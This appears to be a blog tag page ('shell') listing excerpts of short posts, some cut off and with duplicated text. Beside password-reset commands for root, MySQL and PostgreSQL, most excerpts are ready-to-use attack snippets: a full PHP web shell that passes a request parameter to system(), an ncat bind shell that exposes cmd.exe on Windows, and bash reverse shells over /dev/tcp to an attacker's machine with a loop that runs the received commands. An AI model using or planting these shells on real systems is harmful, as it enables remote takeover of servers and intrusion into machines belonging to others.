Tag: shell

Linux, Security

Change admin passwords

System sudo passwd rootsudo passwd root MySQL mysqladmin -u root -p passwordmysqladmin -u root -p password PostgreSQL sudo -u postgres psql -U postgres -h 127.0.0.1 -d postgres -c "ALTER USER postgres WITH PASSWORD ‘newpassword’;"sudo -u postgres psql -U postgres -h 127.0.0.1 -d postgres -c "ALTER USER postgres WITH PASSWORD ‘newpassword’;" Gitlab GLPI Project mysql -u …

PHP, Web Shell

A quick and dirty php web shell

<?php if(isset($_REQUEST[’cmd’])){ echo "Command: <span style=’color:red;’><b>".$_REQUEST[’cmd’]."</b></span> executed."; echo "<pre style=’border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;’>"; $cmd = ($_REQUEST[’cmd’]); system($cmd); echo "</ pre>"; die; }<?php if(isset($_REQUEST[‘cmd’])){ echo "Command: <span style=’color:red;’><b>".$_REQUEST[‘cmd’]."</b></span> executed."; echo "<pre style=’border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;’>"; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo "</ pre>"; die; }

Microsoft Windows, Netcat

Reverse shell with netcat in Windows

> Download and install Nmap! > Locate ncat.exe. You will find it in this folder x:\Program Files (x86)\Nmap if you have an 64bit windows 7 os. > Open command line (cmd). > Change directory to x:\Program Files (x86)\Nmap. To bind command line execute ncat.exe -lvp 6565 -e cmd.exencat.exe -lvp 6565 -e cmd.exe or execute the …

Shells

Reverse shell with bash

Assuming that the attacker’s machine ip address is 192.168.1.111 and the listening port is 8181. Type in the target’s machine terminal /bin/bash -i > /dev/tcp/192.168.1.111/8181 0<&1 2>&1/bin/bash -i > /dev/tcp/192.168.1.111/8181 0<&1 2>&1 hit enter or exec 5<>/dev/tcp/192.168.1.111/8181exec 5<>/dev/tcp/192.168.1.111/8181 hit enter cat <&5 | while read line; do $line 2>&5 >&5; donecat <&5 | while read …